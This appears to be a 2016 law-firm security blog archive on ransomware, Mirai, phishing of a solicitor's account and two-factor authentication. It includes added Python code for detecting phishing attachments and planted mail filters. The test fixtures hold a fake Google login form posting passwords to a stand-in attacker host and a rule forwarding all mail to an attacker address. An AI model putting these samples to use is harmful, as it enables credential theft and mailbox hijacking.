October 2016

October 31, 2016

As a Wall Street Journal blog reported, ransomware has exploded, with attacks growing more sophisticated as criminals are encouraged by the percentage of victims who pay the ransom. Insurance underwriter Beazley released a report last Thursday in which it said ransomware attacks will be four times higher in 2016 than last year.

Sadly, attackers don't need technical expertise: they can simply buy a ransomware kit and put it to use.

Companies that are victims of these attacks aren't given a pass by the authorities. They still may have to report such incidents to regulators and may have to issue data breach notifications, even if no data are removed, said Lisa Sotto, a partner at law firm Hunton & Williams. "I wouldn't expect regulators to be terribly forgiving," she said.

And this is why we preach endlessly that you must have at least one good backup that is never connected to the network, and that you must test that it actually restores. Ransomware is so attractive these days because cybercriminals can make more with it than they can by selling personal data on the dark web.

Last week, we lectured a group of lawyers in Emporia, Virginia, where most of the law firms tend to be quite small. At the end of the presentation, two lawyers approached us to tell us that their small firms had been successfully attacked. Both paid the ransom. One of the lawyers was kind enough to tell us that his firm paid $3000. Affordable to a small firm, but hardly chump change – and they were out of business for eight days. Ouch, ouch, ouch – that's a lot more than $3000 lost!

October 27, 2016

SC Magazine reported yesterday that Flashpoint researchers say the Mirai DDoS attack that took down PayPal, Twitter, Reddit, GitHub, Amazon, Netflix, Spotify and RuneScape was initiated by users from hackforums[.]net and not by a nation-state or cybercriminal organization.

The Flashpoint researchers said that these hackers are known for creating and using commercial DDoS tools and offering their services online as a "DDoS for hire" service.

The attack began last Friday morning, hitting three Dyn data centers in the northeastern U.S., which localized the damage for a time. What was remarkable about the attack is how effectively it used Internet of Things devices, including routers, cameras and DVRs, still running default IDs and passwords and therefore easily enrolled by the Mirai IoT botnet malware.

If nothing else, it was a wake-up call to IoT manufacturers, and hopefully users, to be more proactive about security, starting with changing default passwords.

October 26, 2016

Ars Technica carried a startling story yesterday about two California lawyers accused of filing "sham lawsuits" in a wide-ranging conspiracy to get Google and other search engines to de-index negative reviews about their clients. As the case (PDF) brought by a group called Consumer Opinion states:

"The other conspirators engaged attorneys Mark W. Lapham ("Lapham") and Owen T. Mascott ("Mascott") to file sham lawsuits either by the subjects of the negative reviews or by corporations that had no interest in the allegedly defamatory statements, against a defendant who most certainly was not the party that published the allegedly defamatory statements, and the parties immediately stipulated to a judgment of injunctive relief, so the conspirators could provide the order to Google and other search engines, thus achieving the goal of deindexing all pages containing negative reviews."

Consumer Opinion runs pissedconsumer.com, and the group says these lawyers manipulated California's legal system by conducting a "rather brilliant but incredibly unethical" scheme to make negative reviews on the site essentially disappear from search results. The suit asks a federal judge to "discipline them for those misdeeds."

The suit notes a complex web of reputation companies and fake or "stooge" defendants working together. According to the lawsuit, it works like this: the attorneys sue the "stooge" authors of negative reviews—allegedly defamatory reviews that are published on the pissedconsumer.com site. But these lawsuit defendants didn't actually write the review, and the suits immediately settle. The judgments are then used to get Yahoo, Google, and Bing to erase negative reviews from search results. The suit alleges that a Florida attorney, the subject of some 59 negative reviews on pissedconsumer.com, was among the beneficiaries of the alleged scheme.

Yikes. If true, these attorneys are headed for all kinds of trouble – I can only imagine how the state bar disciplinary folks would view such conduct.

Apparently, this isn't the first time we've seen this type of allegedly fake lawsuit used to game search results, according to Paul Alan Levy of Public Citizen and Eugene Volokh of the Volokh Conspiracy. The two have concluded that there are at least 25 cases nationwide with what they call a "suspicious profile."

"Of these 25-odd cases, 15 give the addresses of the defendants—but a private investigator hired by Professor Volokh (Giles Miller of Lynx Insights & Investigations) couldn't find a single one of the ostensible defendants at the ostensible address," they wrote. As they point out, search engines presented with a court order "can't really know if the injunction was issued against the actual author of the supposed defamation—or against a real person at all."

This kind of gaming the system is deplorable – and the involvement of lawyers, if proven, is a disgrace.

October 25, 2016

Naked Security reported on a phishing e-mail in a story you should really read. The tale involves a man whose solicitor's e-mail account had been hacked. He then received an e-mail from the solicitor's real (not spoofed) e-mail address, complete with his normal e-mail signature. As the recipient was in the middle of moving to a new home and expected paperwork from his solicitor, the e-mail and attachment appeared normal at first.

But as he moved his cursor to open the attachment, he noticed it was called Drafted Contract003.pdf.htm. The double extension .pdf.htm is a deliberate trick: Windows hides known file extensions by default, so a user with that default setting would see only "Drafted Contract003.pdf" and take it for a PDF document rather than the HTM (web page) file it actually was.

On opening the file, instead of a PDF viewer launching, his browser opened with a popup alert. After closing the alert, he was taken to a very realistic-looking Google login page. But the address bar revealed that the page wasn't Google, or even a website URL at all, but the HTM file itself, which he could confirm by opening the HTM in a text editor. Reading the page's source code showed that any username and password a user entered would be submitted to the hacker's server, not to Google.
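The two tells in the story, a web page hiding behind a document extension and a login form that posts somewhere other than Google, can both be checked mechanically before anyone opens an attachment. The following is an added example, not code from Naked Security or the original post; the attachment HTML is constructed, and the attacker host example-attacker.invalid and the list of legitimate Google hosts are assumptions.

```python
"""Triage an e-mail attachment: flag a filename that hides a web page behind
a document extension, then parse the HTML to see where a login form would
actually send the credentials.

Added example, not from the story or the original post. The sample HTML is
constructed; example-attacker.invalid and GOOGLE_HOSTS are assumptions."""
import os
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Extensions that render a page or run code rather than open as a document.
ACTIVE_EXTENSIONS = {".htm", ".html", ".hta", ".js", ".jse", ".vbs", ".wsf", ".scr", ".exe", ".lnk"}
# Extensions a phisher borrows so the attachment looks like a harmless document.
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
# Hosts a genuine Google sign-in form may post to (assumed for this example; suffix-matched).
GOOGLE_HOSTS = ("google.com",)


def check_filename(name):
    """Return reasons the filename looks deceptive (empty list if it looks clean).

    'Drafted Contract003.pdf.htm' is caught twice: its real type is .htm, and
    Windows' default of hiding known extensions displays it as '...003.pdf'."""
    reasons = []
    stem, real_ext = os.path.splitext(name)
    _, inner_ext = os.path.splitext(stem)
    real_ext, inner_ext = real_ext.lower(), inner_ext.lower()
    if real_ext in ACTIVE_EXTENSIONS:
        reasons.append(f"real type is {real_ext}, which renders a page or runs code")
    if inner_ext in DOCUMENT_EXTENSIONS and real_ext and real_ext != inner_ext:
        reasons.append(f"double extension {inner_ext}{real_ext}: shows as {inner_ext} when extensions are hidden")
    return reasons


class LoginFormParser(HTMLParser):
    """Record every <form> and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._open_form = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._open_form = {"action": attrs.get("action") or "", "has_password": False}
            self.forms.append(self._open_form)
        elif tag == "input" and self._open_form is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._open_form["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open_form = None


def credential_sinks(html, legitimate_hosts=GOOGLE_HOSTS):
    """Return the hosts that would receive a password from this page, excluding
    the brand's own hosts. Any entry in the result is a credential-harvesting sink."""
    parser = LoginFormParser()
    parser.feed(html)
    sinks = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        host = (urlsplit(form["action"]).hostname or "").lower()
        if not host:
            sinks.append("(relative action)")
        elif not any(host == h or host.endswith("." + h) for h in legitimate_hosts):
            sinks.append(host)
    return sinks


def triage_attachment(name, html):
    """Combine both checks into one verdict for an HTML attachment."""
    filename_reasons = check_filename(name)
    sinks = credential_sinks(html)
    verdict = "phishing" if sinks or filename_reasons else "no findings"
    return {"filename_reasons": filename_reasons, "credential_sinks": sinks, "verdict": verdict}


# Constructed stand-in for the attachment in the story: a fake Google sign-in
# page whose form posts the password to the attacker's server.
SAMPLE_HTML = """<html><head><title>Sign in - Google Accounts</title></head><body>
<script>alert('Your session has expired. Please sign in again.');</script>
<form method="POST" action="http://example-attacker.invalid/gdoc/login.php">
  <input type="email" name="Email" placeholder="Email">
  <input type="password" name="Passwd" placeholder="Password">
  <input type="submit" value="Sign in">
</form></body></html>"""

if __name__ == "__main__":
    print(triage_attachment("Drafted Contract003.pdf.htm", SAMPLE_HTML))
```

Run against a real attachment, feed it the raw bytes decoded as text; a page that builds its form with JavaScript will not show an `action` to this parser, so an empty result on an HTML attachment is "not proven", not "clean".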

At this point, he contacted his solicitor and alerted him to the fact that his e-mail account had been compromised and it was sending phishing e-mails. The solicitor changed his password and contacted his clients to advise them to be on the lookout for suspicious e-mails.

It is worth reading the story simply to see all the graphics that accompany the narrative above.

This wasn't the end of the attack. The next day, he received another e-mail purportedly from the same solicitor, with the same signature, but this one came from a random Gmail address. This time it had a real PDF file attached called Financial Statements001.pdf. On opening this file, a blurry picture appeared with a link at the top.

The blurring was deliberate, leaving only the Barclays bank logo and an 'Approved' stamp legible. The idea is to trick you into thinking you had been approved for some kind of contract or loan and that clicking the link at the top would let you view the details.

In reality, clicking the link took you to a web page hosted on the same domain as the previous phishing e-mail, which again required you to 'log in' on a fake Google page. Looking at the Whois ownership information for that domain, he saw that it had been registered one week earlier using the presumably fake or stolen personal details of a woman called Fiona in Lagos, Nigeria.

He surmised at this point that the hacker had not only gotten into his solicitor's e-mail account but had also stolen all the contact details in its address book. This allowed the attacker to keep targeting him and the solicitor's other clients with the same details but from different e-mail addresses.

He contacted his solicitor again to try to understand whether he knew how his account had been hacked and what else had happened. It came as no surprise that the solicitor had recently received a similar e-mail that tricked him into entering his Google login credentials. He had been phished, and that led to the account compromise.

Now he wanted to understand the purpose behind the crook's actions: was he just after usernames and passwords to sell on the Dark Web? The answer lay in the filters on the solicitor's e-mail account.

He had twenty new e-mail filters named A, B, C… all the way through to T. Most of these had a similar theme: any e-mail containing a keyword in the subject or message, such as Bank, Statement, or Sort Code, would be moved into a Recently Deleted folder.

For hackers working against the clock, aware that the victim could change the password at any moment, this makes it very quick to get hold of the most valuable e-mails and set them aside for later investigation.

The last few filters targeted e-mails that contained references to Contract003.pdf.htm. These were automatically dumped into the Spam folder. This meant that anyone who tried to warn the solicitor by e-mail that he had been hacked would fail: the warnings vanished into his Spam folder unseen, giving the hacker more time to keep the scam going. Reviewing and removing such filters, and any forwarding rules, should be part of the response to every compromised mail account, not just a password change.
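Finding planted filters like these is a routine step in responding to a compromised mailbox, and it can be scripted against an exported filter list rather than clicked through twenty rules by hand. The following is an added example, not code from the story or the original post. It goes one step beyond the story by also flagging forwarding rules to an outside address, the other common persistence trick in business e-mail compromise. The XML is constructed. Gmail exports filters as an Atom feed (mailFilters.xml); the property names used here (hasTheWord, shouldTrash, shouldArchive, forwardTo, label) are this example's understanding of that format and should be treated as an assumption to check against your own export.

```python
"""Audit a Gmail filter export for rules an intruder plants in a compromised
account: filters that trash or hide mail matching financial keywords, filters
that bury warnings mentioning the phishing attachment, and filters that
forward mail to an outside address.

Added example, not from the story or the original post. SAMPLE_XML is
constructed. The <apps:property> names are assumptions about Gmail's export
format; verify them against a real mailFilters.xml."""
import re
import xml.etree.ElementTree as ET

ATOM = "{http://www.w3.org/2005/Atom}"
APPS = "{http://schemas.google.com/apps/2006}"

# Words an intruder filters on to skim financial mail or suppress warnings.
SENSITIVE = re.compile(
    r"\b(bank|statement|sort code|account number|invoice|payment|wire|iban|"
    r"hacked|phish|compromised|password)", re.I)
# A document extension in front of a web-page extension, as in Contract003.pdf.htm.
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?)\.html?\b", re.I)
# Actions that keep a message out of the inbox (property names assumed).
HIDING_ACTIONS = ("shouldTrash", "shouldArchive", "shouldSpam")

# Constructed export: three planted rules (A, S, T) and one legitimate one.
SAMPLE_XML = """<?xml version='1.0' encoding='UTF-8'?>
<feed xmlns='http://www.w3.org/2005/Atom' xmlns:apps='http://schemas.google.com/apps/2006'>
  <title>Mail Filters</title>
  <entry><title>A</title>
    <apps:property name='hasTheWord' value='bank OR statement OR "sort code"'/>
    <apps:property name='shouldTrash' value='true'/></entry>
  <entry><title>S</title>
    <apps:property name='hasTheWord' value='Contract003.pdf.htm'/>
    <apps:property name='shouldArchive' value='true'/>
    <apps:property name='label' value='Old'/></entry>
  <entry><title>T</title>
    <apps:property name='from' value='*'/>
    <apps:property name='forwardTo' value='collector@example-attacker.invalid'/></entry>
  <entry><title>Newsletters</title>
    <apps:property name='from' value='news@bar-association.invalid'/>
    <apps:property name='shouldArchive' value='true'/>
    <apps:property name='label' value='Newsletters'/></entry>
</feed>"""


def parse_filters(xml_text):
    """Return one {property: value} dict per filter entry, plus its title under '_title'."""
    root = ET.fromstring(xml_text)
    filters = []
    for entry in root.iter(ATOM + "entry"):
        props = {p.get("name"): p.get("value", "") for p in entry.iter(APPS + "property")}
        title = entry.find(ATOM + "title")
        props["_title"] = title.text if title is not None and title.text else ""
        filters.append(props)
    return filters


def suspicious_filters(filters, owner_domain):
    """Return [(title, [reasons])] for filters that look planted by an intruder.

    owner_domain is the account's own mail domain; forwarding anywhere else is flagged."""
    findings = []
    for f in filters:
        reasons = []
        criteria = " ".join(f.get(k, "") for k in ("from", "to", "subject", "hasTheWord")).strip()
        hides = [a for a in HIDING_ACTIONS if f.get(a) == "true"]
        if hides and SENSITIVE.search(criteria):
            reasons.append(f"{'/'.join(hides)} on financial or security keywords: {criteria!r}")
        if hides and DOUBLE_EXT.search(criteria):
            reasons.append(f"{'/'.join(hides)} on mail mentioning a double-extension attachment: {criteria!r}")
        forward = f.get("forwardTo", "")
        if forward and not forward.lower().endswith("@" + owner_domain.lower()):
            reasons.append(f"forwards mail to outside address {forward}")
        if reasons:
            findings.append((f["_title"], reasons))
    return findings


def audit(xml_text, owner_domain):
    """Parse an export and return the suspicious filters in one call."""
    return suspicious_filters(parse_filters(xml_text), owner_domain)


if __name__ == "__main__":
    for title, reasons in audit(SAMPLE_XML, "example-law.invalid"):
        print(f"filter {title!r}:")
        for r in reasons:
            print("   ", r)
```

The keyword list is a starting point, not a verdict: a filter that archives the bar association newsletter is not flagged, while a filter that trashes anything mentioning a bank is. On a real account, also check the forwarding and POP/IMAP settings, which live outside the filter export.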

To protect yourself from e-mails sent under false pretenses by crooks, the author offers the following advice:

Look out for e-mails that come from addresses other than the ones you'd expect.

Be careful of documents that ask you to enable macros or editing before you can see the contents.

Tell Windows Explorer to show file extensions, to protect you against misleading filenames like the one above.

October 24, 2016

The e-mail saying that your Gmail account may have been compromised conveniently contains a link or button for you to click on to remedy the problem. Slow down and think. According to an Ars Technica story, this is exactly how the breaches of the Democratic National Committee and of the personal e-mail accounts of former Secretary of State Colin Powell and Clinton campaign chairman John Podesta took place.

The spear-phishing attack used custom-built Bit.ly shortened URLs that encoded the e-mail addresses of the victims. The URLs appeared in e-mails disguised to look like security warnings from Google about the victims' accounts. Crafty, and as the story notes, it is pretty well confirmed that these bogus warnings came from Russian intelligence or one of their hacking minions.

So, to tell a story on myself, I got a Google e-mail warning that a previously unknown device was accessing my Google account via Internet Explorer, which I do not use. There was a link to view recent activity on my account.

So what do you do? In my case (and it pains me to admit this), I had never gotten around to enabling two-factor authentication on my Gmail account. I am hanging my head in shame. "The cobbler's children have no shoes," right?

Now, we use Mimecast to detect malware, and Mimecast did not see a problem with the link, so it may have been real. But the cautious approach is to log directly into your Gmail account, change your password and enable two-factor authentication (in My Account, Sign-in and Security).

Enabling two-factor authentication had been a task that I just kept pushing to another day in Outlook. With as many of these targeted phishing e-mails as we've seen recently, the time for delay is at an end. Wherever you have private information, ensure your privacy by enabling two-factor authentication if it is available.

The worst part of the experience was the ribbing I took from John, who will no doubt continue the ribbing publicly in our CLEs. And to think I brought this on myself . . .

October 20, 2016

As I mentioned in Monday's blog post, users are suffering from a major case of security fatigue. A recent study from the National Institute of Standards and Technology (NIST) backs that up.

A majority of the typical computer users interviewed experienced security fatigue that leads them to risky computing behavior at work and in their personal lives. Security fatigue is defined in the study as a weariness or reluctance to deal with computer security.

The multidisciplinary team learned that the majority of their average computer users felt overwhelmed and bombarded, and they got tired of being on constant alert, adopting safe behavior, and trying to understand the nuances of online security issues.

Researchers found that this weariness leads to feelings of resignation and loss of control. Those reactions can lead to avoiding decisions, choosing the easiest option among alternatives, making decisions driven by immediate motivations, behaving impulsively, and failing to follow security rules.

The data provided evidence for three ways to ease security fatigue and help users maintain secure online habits and behavior. They are:

Limit the number of security decisions users need to make;

Make it simple for users to choose the right security action; and

Design for consistent decision making whenever possible.

Every time we lecture, we hear about security fatigue from audiences, though it goes by many names. The bottom line is that we have to design systems that allow the user to be foolish without getting hurt – the systems themselves must bear the brunt of achieving security. Needless to say, we have a long way to go in achieving that goal.

October 19, 2016

Our new Legal Talk Network Digital Detectives podcast tackles what was, for us, a brand new topic, the importance of website security for law firms. Our guest was Neill Feather, the President of SiteLock, a firm which specializes in website security.

Disclosure: SiteLock is a sponsor of Digital Detectives.

For many years, we have advised law firms not to host their own websites. Some years ago, one client decided to ignore our advice. The managing partner came to work one day to find that the law firm website home page said "F*** the U.S. Government!" Not precisely the best message for a law firm website!

One of the most significant digital assets a law firm has is its website – and yet, many firms do not think about the security of their website. Take a listen as Neill describes why people compromise websites, how they do it and how you can protect yourself.

Neill gave us quite an education – we knew some of what he told us, but much of what he talked about drilled down further than we had gone before and illuminated this subject in a very helpful way. This will be a very informative podcast for most law firms – and other entities as well.

October 18, 2016

I am pleased to deviate from my normal subject matter to introduce a new book by my friend Merrilyn Tarlton (of Attorney at Work fame – you'll want to subscribe to that blog if you don't already). Entitled Getting Clients: For Lawyers Starting Out or Starting Over, this book is really for any attorney at any stage of his/her career who is concerned about getting clients.

Merrilyn has been curating marketing knowledge and sharing it with clients for thirty years. If you click on the link, you'll see many of my colleagues heaping praise on this book as an indispensable guide. As my friend Jordan Furlong says, the book delivers on the promise of its title.

The book is just $40.00 with 10% off if you order by October 31st – enter the code "GettingClients10".

October 17, 2016

After taking a week off to recover from a hip replacement – and learning that my doctor was right when he said I would need two weeks – RTL is back though a chastened patient remains at home.

It is with delight that I share an excellent article, passed along by my friend Dave Ries and written by the very blunt cybersecurity guru Bruce Schneier. He maintains, correctly I think, that we need to stop blaming users for not being sufficiently educated about security. No wonder NIST and others have found "security fatigue" among users: there are so many things we want them to know and remember when they simply need answers or want to get a task done!

Bruce points out that the interminable warnings users see have an inevitable consequence. As he says, they don't see "the certificate has expired; are you sure you want to go to this webpage?" They see, "I'm an annoying message preventing you from reading a webpage. Click here to get rid of me."

How many times have we all done that?

We need to stop blaming users and start making computing more secure no matter what the user does. Automatic updates and running programs in sandboxes are perfect examples; we need more of them.

Sensei Enterprises, Inc.

3975 University Drive
Suite 225
Fairfax, VA 22030
703.359.0700

Disclaimer

This blog is intended to impart general information and does not offer specific legal advice. Use of this blog does not create an attorney-client relationship. If you require legal advice, consult an attorney.